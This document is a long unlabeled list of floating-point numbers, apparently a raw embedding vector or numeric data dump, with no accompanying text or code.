0.011805130168795586, -0.00683989841490984, 0.0010634404607117176, 0.014696182683110237, 0.015087679028511047, -0.04502211511135101, -0.01745171658694744, -0.0067194378934800625, 0.0007194692152552307, 0.02028253860771656, -0.006455930415540934, -0.010178913362324238, 0.011624439619481564, 0.01546411868184805, 0.014116466045379639, -0.016653666272759438, -0.018505746498703957, 0.001602689502760768, -0.01856597699224949, -0.006429580040276051, 0.018927358090877533, -0.011157655157148838, 0.013220541179180145, 0.01194817665964365, 0.014033650048077106, -0.022842325270175934, -0.010337017476558685, 0.01715056598186493, 0.01292691845446825, 0.01823470927774906, -0.001796555588953197, -0.010246672667562962, 0.00916252750903368, -0.0060456120409071445, -0.0027461231220513582, 0.041558876633644104, 0.006467223633080721, -0.008085912093520164, -0.002572961151599884, 0.009787417016923428, -0.03327721729874611, 0.0076379491947591305, -0.006550040561705828, 0.012512835673987865, -0.0052927336655557156, -0.00637687835842371, 0.007284096442162991, -0.009034538641571999, 0.017527004703879356, 0.03294594958424568, 0.020538518205285072, 0.003363483352586627, -0.018611149862408638, -0.0042838770896196365, -0.015449061058461666, 0.012994677759706974, 0.0019970093853771687, 0.005857392214238644, 0.010502651333808899, 0.008153670467436314, 0.022857382893562317, 0.010231615044176579, 0.007359384559094906, 0.006429580040276051, 0.03905932232737541, -0.02302301488816738, 0.013604508712887764, -0.0026520134415477514, 0.007205044385045767, -0.023760836571455002, -0.0249654408544302, -0.0029381071217358112, -0.0031093868892639875, 0.008710800670087337, 0.0023339223116636276, -0.012460133992135525, 0.013062437064945698, -0.009230286814272404, -0.012957033701241016, -0.011428691446781158, 0.01023914385586977, -0.01536624412983656, 0.01194817665964365, -0.01057793851941824, -0.015283427201211452, -0.007479845080524683, -0.005100749898701906, 0.004976524971425533, 0.016894586384296417, -0.0067194378934800625, 0.0022492236457765102, -0.0011631968664005399, -0.01739148609340191, -0.007073290646076202, -0.010224086232483387, -0.002343333326280117, 0.015245783142745495, -0.007445965427905321, -0.01578032784163952, -0.012271914631128311, -0.01827988214790821, -0.023474741727113724, -0.029302019625902176, -0.02224002219736576, -0.02193887159228325, 0.00002701244557101745, 0.01275375671684742, 0.005255089607089758, 0.008793617598712444, 0.010720985941588879, 0.012693526223301888, -0.006553804501891136, 0.005428251810371876, 0.0014502316480502486, -0.012964562512934208, 0.014199282974004745, 0.0032204363960772753, -0.02067403495311737, 0.038878630846738815, 0.006327941082417965, 0.006034318823367357, 0.01390566024929285, -0.022556230425834656, 0.012896803207695484, 0.004468332044780254, -0.011978291906416416, 0.030777661129832268, -0.004856064449995756, 0.014801585115492344, -0.0018567858496680856, -0.007125992327928543, -0.025778548792004585, -0.006934008095413446, -0.01608147844672203, -0.005435780622065067, -0.015599636361002922, 0.016457917168736458, 0.008206372149288654, -0.02165277674794197, 0.010615582577884197, 0.0031602061353623867, 0.013499106280505657, -0.011082367040216923, 0.009734715335071087, 0.014116466045379639, 0.01910804957151413, 0.004912530072033405, 0.02574843354523182, 0.005898800678551197, -0.005349199753254652, 0.028910523280501366, 0.017361370846629143, 0.010126211680471897, 0.014485376887023449, 0.0032467872370034456, -0.004016605205833912, -0.004810891579836607, -0.015012390911579132, 0.010434892028570175, 0.0015452825464308262, 0.007171164732426405, -0.002872230252251029, -0.012618239037692547, 0.01588572934269905, 0.0018934886902570724, -0.021276338025927544, -0.0010596760548651218, -0.005145922303199768, -0.002550374949350953, -0.0028684658464044333, 0.012520364485681057, 0.005198623985052109, -0.004426924046128988, 0.0016760950675234199, 0.004291405901312828, -0.0002193934196839109, 0.00877103116363287, 0.026079701259732246, -0.00022468708630185574, -0.020252423360943794, -0.002629427006468177, -0.006960358936339617, 0.0023000428918749094, 0.00001976305247808341, -0.009682013653218746, -0.009779888205230236, 0.007592776790261269, 0.002872230252251029, -0.008710800670087337, -0.004351635929197073, 0.010367132723331451, 0.00033926573814824224, 0.001199899590574205, -0.018746666610240936, 0.008409649133682251, -0.0084548220038414, -0.0005364257376641035, -0.019951272755861282, -0.009064653888344765, 0.018355170264840126, 0.013258185237646103, -0.014191754162311554, -0.008296717889606953, -0.006422051228582859, -0.009855175390839577, -0.0034952370915561914, -0.01143622025847435, -0.00271224370226264, 0.005145922303199768, -0.017572177574038506, -0.0064898100681602955, 0.004626436624675989, 0.00010928497795248404, 0.003403009381145239, 0.0025484927464276552, 0.008658098988234997, 0.009538967162370682, -0.010856503620743752, 0.028850292786955833, -0.003376658773049712, 0.005454602651298046, 0.022812210023403168, -0.004784540738910437, 0.01045747846364975, -0.00042231762199662626, -0.005401900969445705, -0.006327941082417965, 0.005733167286962271, -0.0037079250905662775, -0.0013081259094178677, -0.01642780192196369, -0.0038114457856863737, 0.02032771147787571, -0.0309282373636961, 0.008530110120773315, 0.014161638915538788, 0.012941976077854633, 0.01121788565069437, -0.0169999897480011, -0.0027574163395911455, -0.01553940586745739, -0.02629050612449646, 0.020990245044231415, -0.024122217670083046, -0.017045162618160248, -0.0015744565753266215, -0.0031940857879817486, 0.038487132638692856, -0.024408310651779175, 0.004731839522719383, 0.012505306862294674, -0.021682891994714737, -0.017767924815416336, -0.012603181414306164, -0.02193887159228325, 0.004596321377903223, -0.004257526248693466, 0.013356058858335018, -0.0031639705412089825, -0.008522581309080124, -0.02903098426759243, -0.00156692776363343, 0.03737287223339081, -0.023098303005099297, -0.007551368325948715, -0.014635952189564705, 0.009147469885647297, 0.009328161366283894, -0.0018972530961036682, -0.002036535646766424, 0.007046939805150032, -0.011586795561015606, 0.008846319280564785, -0.009990694001317024, -0.004814655985683203, -0.02178829535841942, 0.014854286797344685, -0.00002582136949058622, -0.005857392214238644, 0.017271025106310844, 0.0023583909496665, 0.0059402091428637505, 0.014364915899932384, -0.031139042228460312, 0.026606716215610504, -0.009794945828616619, -0.0068888356909155846, 0.0010333253303542733, 0.01778298243880272, 0.0004907824913971126, -0.0011556680547073483, 0.028654543682932854, -0.00877103116363287, -0.01588572934269905, 0.013875545002520084, 0.011428691446781158, -0.010698399506509304, -0.002693421673029661, -0.011722313240170479, 0.004837242420762777, -0.020734265446662903, 0.004682902246713638, 0.020930014550685883, 0.006196187809109688, 0.006218773778527975, 0.008951721712946892, 0.014312214218080044, 0.007302918471395969, -0.007980508729815483, 0.020704150199890137, 0.004701724275946617, -0.0026482490357011557, 0.0020553574431687593, 0.004547384101897478, 0.010660755448043346, -0.008372006006538868, 0.01617182418704033, 0.00005455426071421243, -0.01823470927774906, 0.000949567649513483, 0.010502651333808899, 0.010178913362324238, -0.017813097685575485, 0.014063764363527298, 0.017165623605251312, 0.010826388373970985, -0.01035960391163826, -0.005085692275315523, -0.013401231728494167, 0.004005311988294125, -0.026621773838996887, -0.01686447113752365, 0.0015396359376609325, -0.009840117767453194, -0.00904206745326519, -0.011104953475296497, 0.0041784741915762424, -0.0011848420836031437, 0.007829933427274227, -0.013122666627168655, -0.00859786942601204, -0.03674045577645302, 0.00926040206104517, -0.00791274942457676, -0.009448621422052383, 0.0084548220038414, 0.007837462238967419, -0.022857382893562317, 0.022616460919380188, 0.00916252750903368, 0.006666736677289009, -0.03827632591128349, -0.006967887748032808, 0.01014126930385828, 0.0026501312386244535, 0.005334142129868269, 0.020583689212799072, -0.006662972271442413, 0.01449290569871664, 0.023625317960977554, -0.003527234308421612, 0.006117135286331177, 0.008695743046700954, 0.010758629068732262, 0.020418057218194008, 0.005977852735668421, 0.009877761825919151, -0.020749323070049286, 0.007762174122035503, -0.0024016813840717077, 0.0014069410972297192, 0.010389719158411026, 0.010818859562277794, -0.008259073831140995, 0.027976954355835915, 0.004329049494117498, -0.009170056320726871, 0.012776343151926994, 0.016653666272759438, -0.0179787315428257, 0.00926040206104517, 0.015795385465025902, -0.027826378121972084, -0.01760229282081127, -0.006824840791523457, 0.0020553574431687593, -0.0075476039201021194, 0.03297606483101845, 0.018791839480400085, -0.01568998210132122, -0.00002565961767686531, 0.0036364016123116016, 0.012798929587006569, -0.020734265446662903, -0.001391883590258658, -0.012294501066207886, 0.033006180077791214, 0.0022962784860283136, 0.003011512802913785, -0.005537419114261866, -0.01008856762200594, 0.014101408421993256, -0.01725596748292446, 0.03025064617395401, -0.01784321293234825, 0.022511057555675507, -0.004212353378534317, 0.015065092593431473, -0.01623205468058586, -0.006787197198718786, 0.021713007241487503, -0.0012563654454424977, -0.005906329490244389, 0.00100226909853518, -0.0005274852737784386, -0.017873328179121017, -0.004313991870731115, 0.0009232168667949736, 0.03180157393217087, 0.03625861555337906, -0.00577834015712142, -0.006546276155859232, -0.004592556972056627, -0.011782543733716011, -0.016382629051804543, -0.001458701561205089, -0.015343657694756985, -0.006787197198718786, 0.031259503215551376, -0.0008559284033253789, 0.002642602426931262, -0.01945437304675579, 0.011293172836303711, -0.016638608649373055, -0.0002806824049912393, -0.001993244979530573, 0.00260307639837265, 0.006316648330539465, -0.0003383246366865933, 0.0073179760947823524, 0.056465864181518555, -0.003914966713637114, -0.0042688194662332535, 0.013529221527278423, 0.00970460008829832, -0.0064145224168896675, 0.009350746870040894, -0.00921522919088602, -0.02785649336874485, -0.004912530072033405, -0.012550479732453823, -0.006226302590221167, -0.028022127225995064, -0.00044419814366847277, -0.0002710361441131681, -0.013386174105107784, 0.016789183020591736, -0.028112471103668213, 0.01143622025847435, 0.0021607603412121534, 0.01106730941683054, 0.011089895851910114, -0.005379314534366131, 0.006843662820756435, 0.015961017459630966, -0.004065542481839657, -0.01999644562602043, 0.0178883858025074, -0.03333744779229164, 0.0014841111842542887, 0.0023508621379733086, -0.007310447283089161, -0.012422489933669567, -0.0038170923944562674, 0.03128961846232414, -0.009328161366283894, 0.009057125076651573, -0.004340342711657286, -0.012798929587006569, -0.015720097348093987, -0.004155887756496668, -0.008748444728553295, 0.0043441071175038815, -0.020418057218194008, 0.00264448462985456, -0.001635627937503159, 0.01306996587663889, -0.012595652602612972, -0.021622661501169205, -0.014861815609037876, -0.006437108386307955, -0.014139052480459213, -0.002042182022705674, -0.0038810870610177517, -0.011180241592228413, 0.025281649082899094, -0.004186003003269434, -0.004042956046760082, 0.009840117767453194, 0.012670939788222313, 0.014244455844163895, -0.0049577029421925545, 0.016397686675190926, -0.0129720913246274, 0.0022416948340833187, -0.00394508196040988, -0.0051873307675123215, 0.013047379441559315, -0.008085912093520164, -0.008048268035054207, 0.022616460919380188, 0.005620235577225685, 0.007197515573352575, -0.016488032415509224, -0.02400175668299198, -0.00011904886196134612, 0.01471124030649662, 0.011752428486943245, 0.0021946399938315153, -0.023565087467432022, 0.000030791543395025656, -0.011601853184401989, -0.006373113952577114, -0.002642602426931262, -0.022661633789539337, 0.002130645327270031, -0.008424706757068634, -0.0014172932133078575, 0.00022139324573799968, 0.027585458010435104, -0.01564480923116207, -0.000827224925160408, 0.009930463507771492, -0.016548262909054756, -0.02433302253484726, 0.03375905752182007, 0.015569521114230156, 0.010013280436396599, -0.013009735383093357, -0.007942864671349525, 0.007359384559094906, -0.010653226636350155, -0.005567534361034632, 0.024122217670083046, -0.004193531349301338, 0.00004361399987828918, -0.005300262477248907, -0.004050484858453274, 0.003293842077255249, 0.04252256080508232, 0.03144019469618797, -0.009712128899991512, 0.006911421660333872, 0.005883743055164814, 0.004773247987031937, 0.004905001260340214, -0.0010860267793759704, 0.014997333288192749, -0.0041144792921841145, 0.031048696488142014, 0.00004670197449740954, 0.03415055572986603, -0.008161199279129505, 0.0016930348938331008, -0.01143622025847435, 0.006309119518846273, 0.016593435779213905, 0.005770811345428228, -0.02004161849617958, 0.014206811785697937, 0.0037606265395879745, 0.0027762383688241243, -0.00953143835067749, -0.028955696150660515, -0.0057858689688146114, 0.0074083213694393635, 0.029106270521879196, -0.0044231596402823925, -0.0012469545472413301, 0.00218146457336843, 0.007724530529230833, -0.01434232946485281, 0.02126128040254116, -0.006975416559726, -0.0027856493834406137, -0.01773780956864357, -0.01192559115588665, -0.00722010200843215, 0.019951272755861282, 0.02589900977909565, -0.03758367896080017, 0.01270858384668827, 0.0028458796441555023, -0.0054809534922242165, -0.003809563582763076, -0.006501103285700083, -0.006041847635060549, 0.0015942195896059275, 0.0134614622220397, -0.008296717889606953, -0.011586795561015606, -0.017511947080492973, -0.004844771232455969, 0.00664791464805603, -0.003854736452922225, 0.0011340228375047445, 0.00784499105066061, 0.01695481687784195, -0.028082357719540596, -0.009049596264958382, -0.034090325236320496, -0.006534982938319445, -0.011835245415568352, 0.008153670467436314, 0.02404692955315113, -0.008635512553155422, -0.01053276564925909, -0.01194817665964365, 0.0029475181363523006, 0.0007439377950504422, -0.009275459684431553, -0.02219484932720661, -0.031169157475233078, -0.00926040206104517, 0.0014342329232022166, -0.02043311484158039, -0.012445076368749142, -0.003824621206149459, 0.01862620748579502, 0.0038999090902507305, 0.006918950472027063, 0.0013297711266204715, -0.01588572934269905, -0.0038152101915329695, -0.01319795474410057, -0.014327271841466427, -0.017767924815416336, -0.004411866422742605, -0.016728954389691353, -0.0169999897480011, -0.010992021299898624, -0.028699716553092003, 0.003677810076624155, -0.0005938326939940453, 0.015095207840204239, -0.0012638942571356893, 0.0018756077624857426, -0.033698827028274536, 0.01079627312719822, -0.0058912718668580055, 0.01989104226231575, -0.002571078948676586, -0.00818378571420908, -0.005334142129868269, 0.007404556963592768, -0.013122666627168655, -0.009245344437658787, -0.01243754755705595, -0.01919839344918728, 0.005296498071402311, -0.0011839009821414948, -0.017798040062189102, -0.005473424680531025, 0.02433302253484726, 0.009275459684431553, -0.002655777847394347, 0.019860927015542984, 0.040775883942842484, -0.018701493740081787, -0.007995566353201866, 0.008929135277867317, 0.0027856493834406137, -0.02482992224395275, 0.015961017459630966, -0.016051363199949265, -0.009689542464911938, 0.009810002520680428, -0.009486265480518341, -0.0009561553015373647, -0.0238511823117733, -0.016894586384296417, -0.027480054646730423, -0.015870671719312668, -0.024844979867339134, 0.014688653871417046, -0.0019273682264611125, 0.017677580937743187, -0.009019481018185616, 0.011812658980488777, -0.007427143398672342, 0.011692197993397713, 0.017361370846629143, 0.0021381741389632225, 0.0258538369089365, 0.0049727605655789375, 0.02580866403877735, 0.001336358836852014, -0.015140380710363388, -0.004916294477880001, 0.012859160080552101, -0.011571737937629223, 0.0011697844602167606, -0.02004161849617958, -0.006064434070140123, 0.0016045717056840658, -0.0017372664296999574, -0.008936664089560509, 0.023444626480340958, -0.0198458693921566, -0.02374577894806862, -0.01084897480905056, -0.01270858384668827, 0.018867127597332, 0.0036702812649309635, -0.002971986774355173, -0.0033183107152581215, -0.004295170307159424, -0.015629751607775688, -0.005258854012936354, 0.0024600294418632984, 0.02198404259979725, -0.0034820616710931063, -0.019228508695960045, -0.016924701631069183, -0.02330910973250866, 0.03107881173491478, 0.016683781519532204, 0.0178883858025074, -0.006297826301306486, -0.0006291238241828978, -0.0074233789928257465, -0.0004256114480085671, -0.009937992319464684, -0.014937103725969791, 0.011940647847950459, -0.006290297489613295, -0.009418506175279617, -0.004272583872079849, 0.02282726764678955, -0.0050480482168495655, -0.0055073038674890995, 0.0019951271824538708, 0.01002080924808979, -0.003986489959061146, 0.023580145090818405, 0.013205483555793762, -0.004848535638302565, -0.006226302590221167, 0.005304026883095503, -0.010442420840263367, -0.0074723162688314915, -0.01263329666107893, 0.01324312761425972, 0.023519914597272873, 0.01116518396884203, -0.02213461883366108, -0.0032072612084448338, 0.014726297929883003, 0.012844102457165718, 0.02037288434803486, -0.009621783159673214, -0.0012751874746754766, -0.008740915916860104, 0.012354731559753418, 0.006685558240860701, -0.009019481018185616, 0.0039036734960973263, -0.007705708499997854, 0.007284096442162991, -0.008469879627227783, 0.0009462737943977118, -0.014839229173958302, -0.007589012384414673, -0.018641265109181404, 0.009727186523377895, -0.02115587703883648, -0.014425146393477917, -0.008296717889606953, 0.0035667605698108673, 0.00431022746488452, 0.003785095177590847, -0.011406105011701584, 0.010193970985710621, -0.00602302560582757, 0.016051363199949265, -0.03412044048309326, -0.0022849852684885263, -0.0075777191668748856, -0.015900786966085434, 0.017135508358478546, -0.0025108486879616976, -0.00288917007856071, 0.001198958489112556, -0.007028117775917053, -0.009124883450567722, -0.0021099410951137543, -0.01642780192196369, -0.016262169927358627, 0.02198404259979725, -0.0012921271845698357, -0.010954378172755241, 0.002642602426931262, -0.008432235568761826, -0.024739578366279602, -0.011880418285727501, -0.0042274110019207, -0.04300440102815628, -0.00044984472333453596, 0.004713017493486404, 0.006060669664293528, -0.0005787751288153231, 0.007664300035685301, -0.02541716769337654, -0.0048673576675355434, 0.020945072174072266, -0.0000949332388699986, 0.022706806659698486, -0.000949567649513483, -0.0008512228960171342, 0.01204605121165514, 0.0014954042853787541, -0.015230726450681686, 0.0012845983728766441, 0.01075110025703907, -0.011887947097420692, -0.000013734144886257127, -0.012204155325889587, -0.011473863385617733, -0.013724969699978828, 0.03366871178150177, 0.022270137444138527, 0.02541716769337654, 0.005025461781769991, -0.007287860848009586, -0.020809553563594818, 0.009621783159673214, -0.0005063106073066592, -0.011677141301333904, 0.0022943962831050158, 0.0010822623735293746, 0.006199951749294996, -0.006881306879222393, -0.014869344420731068, -0.011308230459690094, 0.004460803233087063, 0.02824798971414566, -0.002655777847394347, 0.002796942600980401, -0.0012770696775987744, 0.019770581275224686, 0.005368021782487631, -0.02522142045199871, 0.0006615917081944644, -0.013657210394740105, 0.018309997394680977, 0.008168728090822697, -0.0021889933850616217, -0.007077055051922798, 0.00921522919088602, -0.01008856762200594, -0.004389279987663031, -0.0038810870610177517, -0.010562880896031857, -0.008537638932466507, 0.011496449820697308, 0.00485230004414916, -0.013694854453206062, 0.017632408067584038, 0.008424706757068634, 0.004780776798725128, 0.00974977295845747, 0.008078383281826973, 0.02160760387778282, 0.0033201929181814194, 0.025251535698771477, -0.012399903498589993, 0.0024035635869950056, -0.006704380270093679, 0.009516380727291107, -0.023143475875258446, 0.012347202748060226, -0.001337299938313663, -0.019379084929823875, -0.008055796846747398, 0.020749323070049286, 0.04466073587536812, 0.004596321377903223, -0.026034528389573097, 0.004720546305179596, 0.014176696538925171, 0.030024781823158264, -0.005428251810371876, 0.016879528760910034, 0.004841006826609373, 0.020598746836185455, 0.0057105813175439835, 0.0057369316928088665, -0.0036156976129859686, -0.004069306887686253, -0.015238254331052303, 0.01945437304675579, 0.009817531332373619, -0.001023914315737784, -0.00860539823770523, 0.021050473675131798, 0.018309997394680977, 0.00640322919934988, 0.016698839142918587, -0.014824171550571918, -0.022300252690911293, -0.003753097727894783, 0.024905210360884666, -0.0017984377918764949, -0.00436292914673686, -0.011564209125936031, 0.016894586384296417, -0.01725596748292446, -0.0014370562275871634, -0.0027743561659008265, -0.011127539910376072, -0.015810443088412285, 0.01710539311170578, -0.012542950920760632, 0.0089441929012537, 0.007287860848009586, 0.01998138800263405, -0.006745788734406233, 0.019138162955641747, 0.006207480560988188, 0.009546495974063873, 0.009328161366283894, -0.007705708499997854, 0.009960578754544258, -0.003467004047706723, -0.022420713678002357, -0.00700176740065217, 0.02028253860771656, 0.010743572376668453, 0.005620235577225685, -0.016548262909054756, -0.0033578367438167334, -0.005511068273335695, -0.007558897137641907, -0.002431796630844474, -0.0020553574431687593, 0.02047828771173954, 0.010766157880425453, 0.025989355519413948, 0.004073071293532848, 0.0027385945431888103, -0.019514603540301323, 0.009787417016923428, -0.0059552667662501335, -0.0016695073572918773, -0.019364027306437492, 0.002955046948045492, 0.00016257463721558452, 0.013378645293414593, 0.00982506014406681, -0.014959690161049366, 0.004306463524699211, 0.006128428503870964, -0.015215668827295303, -0.009832588955760002, 0.007822404615581036, 0.00135612185113132, -0.0028308220207691193, 0.0016469210386276245, 0.0058912718668580055, -0.007604070007801056, -0.020583689212799072, -0.018897242844104767, -0.0028647014405578375, -0.011225413531064987, -0.0051271007396280766, -0.016638608649373055, -0.004566206131130457, 0.012196626514196396, 0.019077934324741364, -0.021231165155768394, 0.01094684936106205, 0.027796262875199318, -0.030612027272582054, -0.03752344846725464, -0.012618239037692547, -0.0004070247814524919, -0.00713728554546833, 0.006455930415540934, 0.023534972220659256, 0.0004032603756058961, 0.0029362249188125134, 0.002749887527897954, -0.002292514080181718, 0.008070854470133781, 0.0021513495594263077, 0.015449061058461666, -0.0025108486879616976, -0.012768814340233803, -0.0034594752360135317, -0.0034218314103782177, -0.018596092239022255, 0.007250217255204916, 0.017557119950652122, 0.011940647847950459, 0.006263946648687124, 0.01686447113752365, -0.02433302253484726, -0.031139042228460312, -0.010276786983013153, -0.03147030994296074, -0.005861156620085239, 0.0026783642824739218, 0.00908724032342434, -0.01094684936106205, -0.008048268035054207, -0.012068637646734715, 0.007272803224623203, -0.00395637471228838, 0.014809113927185535, -0.0031395021360367537, 0.009192642755806446, -0.011037194170057774, 0.006851191632449627, 0.0008705154177732766, 0.002589900977909565, 0.037312645465135574, 0.0227820947766304, -0.022947726771235466, -0.008131084963679314, -0.03713195398449898, 0.0019076050957664847, 0.005544947925955057, 0.010999550111591816, -0.01852080412209034, -0.017466774210333824, -0.03384940326213837, 0.003350307932123542, 0.0027931781951338053, -0.027976954355835915, -0.006215009372681379, -0.002832704223692417, 0.006282768677920103, -0.017135508358478546, 0.021532315760850906, 0.010005751624703407, 0.022345425561070442, 0.0030435100197792053, -0.029332134872674942, 0.010826388373970985, 0.001867137965746224, 0.005025461781769991, -0.0026802464853972197, -0.02502567134797573, 0.01817448064684868, 0.01930379681289196, 0.008198843337595463, 0.004306463524699211, -0.007415850181132555, -0.044449929147958755, 0.015095207840204239, 0.00615854375064373, 0.029392365366220474, -0.0028477618470788, 0.01249024923890829, 0.022932669147849083, -0.0019480723422020674, 0.014628423377871513, -0.0005900682881474495, 0.0004526680277194828, -0.014718769118189812, -0.0017532651545479894, -0.011082367040216923, 0.000828166026622057, 0.0124827204272151, -0.02482992224395275, -0.00024139157903846353, -0.0134614622220397, 0.0042688194662332535, 0.01675906963646412, 0.008432235568761826, 0.01832505501806736, -0.020734265446662903, -0.02062886208295822, -0.017225854098796844, 0.00626771105453372, -0.0029531647451221943, -0.013521692715585232, 0.0037116894964128733, -0.008432235568761826, -0.003647694829851389, 0.013408760540187359, -0.01475641317665577, -0.0002536258543841541, -0.016774125397205353, 0.023760836571455002, -0.01426704227924347, 0.01057793851941824, -0.01919839344918728, 0.0074873738922178745, -0.003258080454543233, -0.01930379681289196, -0.0021344097331166267, 0.01641274429857731, -0.005544947925955057, -0.005142157897353172, -0.016849413514137268, -0.03532504662871361, -0.00012116633297409862, -0.019966330379247665, 0.004878650885075331, -0.006723202299326658, 0.014447732828557491, 0.019921157509088516, 0.011202828027307987, 0.02579360641539097, 0.010720985941588879, -0.013664739206433296, 0.01549423299729824, 0.023444626480340958, 0.016698839142918587, -0.002303807297721505, 0.0023132183123379946, 0.0034914726857095957, -0.01112001109868288, 0.015720097348093987, 0.006196187809109688, 0.009456150233745575, 0.011857831850647926, 0.01014126930385828, 0.009305574931204319, 0.020884841680526733, -0.0064408727921545506, 0.010788744315505028, -0.0031639705412089825, 0.013213012367486954, -0.009328161366283894, 0.005157215520739555, 0.01627722755074501, 0.008981836959719658, 0.015991132706403732, 0.014794056303799152, 0.006531218532472849, 0.0013420054456219077, -0.004340342711657286, -0.0046377298422157764, 0.007427143398672342, 0.011677141301333904, 0.005676701664924622, -0.00959919672459364, 0.003254316048696637, 0.011586795561015606, -0.0057105813175439835, 0.011323288083076477, -0.005552476737648249, -0.0024788514710962772, 0.011631968431174755, -0.031349848955869675, 0.027766147628426552, 0.011707255616784096, 0.00380015280097723, -0.005266382824629545, 0.0026633066590875387, -0.0073330337181687355, 0.018596092239022255, 0.002522141905501485, -0.025040728971362114, -0.017361370846629143, -0.019770581275224686, 0.016533205285668373, -0.0051120431162416935, -0.004746897146105766, -0.007656771223992109, -0.014688653871417046, 0.0046791378408670425, -0.013747556135058403, 0.007306682877242565, -0.012347202748060226, 0.011368460953235626, 0.012038522399961948, -0.013566865585744381, 0.027043385431170464, 0.015057563781738281, -0.0011904886923730373, 0.010773686692118645, -0.00326937367208302, 0.030175358057022095, -0.009290517307817936, -0.017316197976469994, -0.009629311971366405, 0.004186003003269434, 0.0024920268915593624, -0.03631884604692459, 0.010976964607834816, -0.012731170281767845, 0.004140830133110285, 0.01133834570646286, 0.013845429755747318, -0.011918062344193459, 0.014620894566178322, -0.017752867192029953, 0.004995347000658512, 0.006369349546730518, 0.005770811345428228, 0.0074083213694393635, 0.019921157509088516, -0.0061848945915699005, 0.013604508712887764, 0.008131084963679314, 0.012053580023348331, 0.0024901446886360645, 0.00970460008829832, -0.004140830133110285, 0.006015496794134378, -0.01412399485707283, -0.0026143696159124374, -0.012746227905154228, 0.021487144753336906, 0.012866688892245293, 0.0036872210912406445, -0.024227621033787727, 0.008530110120773315, 0.013770142570137978, 0.003150795353576541, -0.006452166009694338, -0.022511057555675507, 0.022751979529857635, -0.014726297929883003, -0.007942864671349525, 0.003083036281168461, 0.006877542473375797, -0.005748224910348654, 0.009373333305120468, -0.022857382893562317, 0.006975416559726, -0.00045125637552700937, 0.004942645318806171, 0.011519036255776882, 0.03523470088839531, 0.018204594030976295, -0.00331078190356493, -0.01568998210132122, 0.012121339328587055, 0.018144365400075912, -0.005902565084397793, -0.008740915916860104, -0.012399903498589993, 0.001462465850636363, 0.001640333328396082, 0.007016825024038553, 0.020252423360943794, 0.020884841680526733, 0.005906329490244389, -0.016488032415509224, -0.015351186506450176, 0.0031075046863406897, -0.0000377909564122092, 0.017632408067584038, 0.02648625522851944, -0.0043591647408902645, -0.008650570176541805, 0.019906099885702133, -0.004746897146105766, -0.005311555694788694, -0.002023360226303339, 0.004807127173990011, -0.007615363225340843, 0.022706806659698486, 0.016352513805031776, -0.003361601149663329, 0.017165623605251312, 0.0004912530421279371, -0.003803917206823826, -0.0019424257334321737, 0.02848891168832779, 0.012053580023348331, 0.013920717872679234, 0.015238254331052303, -0.011345874518156052, -0.006550040561705828, 0.017767924815416336, 0.011805130168795586, 0.009885290637612343, 0.005176037549972534, -0.002565432572737336, -0.01701504737138748, 0.014771469868719578, 0.0030868006870150566, 0.024799806997179985, 0.0011744899675250053, 0.012829044833779335, -0.021366683766245842, -0.007506195455789566, 0.020930014550685883, 0.03246410936117172, 0.0006004203460179269, -0.011059780605137348, 0.0000611713549005799, 0.0068587204441428185, -0.003308899700641632, -0.018264824524521828, 0.01307749468833208, 0.0033973627723753452, -0.01686447113752365, -0.0007020588964223862, -0.010404776781797409, 0.003135737730190158, 0.006388171575963497, -0.0025409639347344637, -0.003997783176600933, 0.017557119950652122, 0.011202828027307987, -0.016247112303972244, 0.007517488673329353, -0.0027385945431888103, -0.010111154057085514, -0.00823648739606142, 0.014771469868719578, 0.011345874518156052, 0.0017052690964192152, -0.0036025221925228834, 0.011963234283030033, -0.012896803207695484, 0.005823513027280569, -0.012731170281767845, -0.004276348277926445, -0.0009561553015373647, -0.006162308156490326, -0.009930463507771492, -0.028503969311714172, -0.013664739206433296, 0.02037288434803486, -0.005514832679182291, 0.0019085461972281337, -0.031741343438625336, -0.0066441502422094345, -0.018490688875317574, -0.0006615917081944644, 0.027766147628426552, 0.0021758179645985365, -0.008590340614318848, 0.010284315794706345, -0.023489799350500107, -0.0006314765778370202, 0.017421601340174675, 0.011135068722069263, 0.016939759254455566, 0.008319304324686527, -0.00724645284935832, 0.006881306879222393, -0.020689092576503754, -0.0001702210574876517, 0.017436658963561058, 0.0029682223685085773, 0.016924701631069183, 0.0026388380210846663, 0.005593885201960802, 0.013047379441559315, 0.002501437906175852, 0.01642780192196369, 0.002412974601611495, -0.018189536407589912, -0.005989145953208208, 0.0022868674714118242, 0.009659427218139172, -0.014093879610300064, -0.0012968326918780804, -0.022556230425834656, 0.0007062938529998064, 0.010864032432436943, 0.007061997428536415, 0.0006794725777581334, -0.010284315794706345, 0.03201238065958023, -0.008703271858394146, 0.013566865585744381, 0.017813097685575485, 0.010683341883122921, 0.008206372149288654, -0.009252873249351978, -0.02178829535841942, 0.00460761459544301, -0.02267669141292572, 0.00774711649864912, -0.005823513027280569, -0.01832505501806736, -0.03839678689837456, -0.017316197976469994, 0.005176037549972534, -0.0011170830111950636, -0.004761954769492149, 0.0025447283405810595, -0.003700396278873086, -0.013800257816910744, 0.014334800653159618, 0.011526565067470074, 0.01745171658694744, -0.002642602426931262, -0.013506635092198849, 0.010374661535024643, 0.006459694821387529, 0.017466774210333824, 0.017165623605251312, -0.0013636506628245115, 0.01209875289350748, -0.009192642755806446, 0.01498227659612894, 0.00862045492976904, -0.010284315794706345, -0.005458367057144642, 0.00784499105066061, -0.026350736618041992, -0.02613993175327778, 0.013220541179180145, 0.01608147844672203, 0.026516370475292206, 0.012738699093461037, -0.016578378155827522, -0.002130645327270031, -0.01280645839869976, 0.023143475875258446, 0.006531218532472849, 0.007449729833751917, -0.019951272755861282, 0.0189574733376503, -0.008861375972628593, -0.01187288947403431, -0.002695303875952959, 0.05586356297135353, 0.006930243689566851, 0.0198458693921566, 0.0018934886902570724, 0.004389279987663031, -0.005405665375292301, -0.0031940857879817486, -0.0021419385448098183, -0.003115033498033881, 0.007732059340924025, -0.004265055060386658, 0.0028308220207691193, 0.014666067436337471, -0.009569081477820873, -0.007223866414278746, 0.009644369594752789, 0.0028044714126735926, 0.006561333313584328, -0.0015801030676811934, -0.01500486209988594, -0.015117794275283813, -0.0038170923944562674, 0.027254190295934677, -0.009983165189623833, -0.0020346534438431263, 0.016051363199949265, 0.0028402330353856087, -0.015750212594866753, 0.006252653431147337, 0.0006408875924535096, 0.03171122819185257, -0.004487154074013233, -0.016066420823335648, -0.0013401232426986098, 0.007461023051291704, 0.012008407153189182, 0.0012375435326248407, 0.01549423299729824, 0.01319795474410057, 0.003594993380829692, -0.0057369316928088665, 0.011097424663603306, -0.023790951818227768, 0.004012840799987316, -0.00037385107134468853, 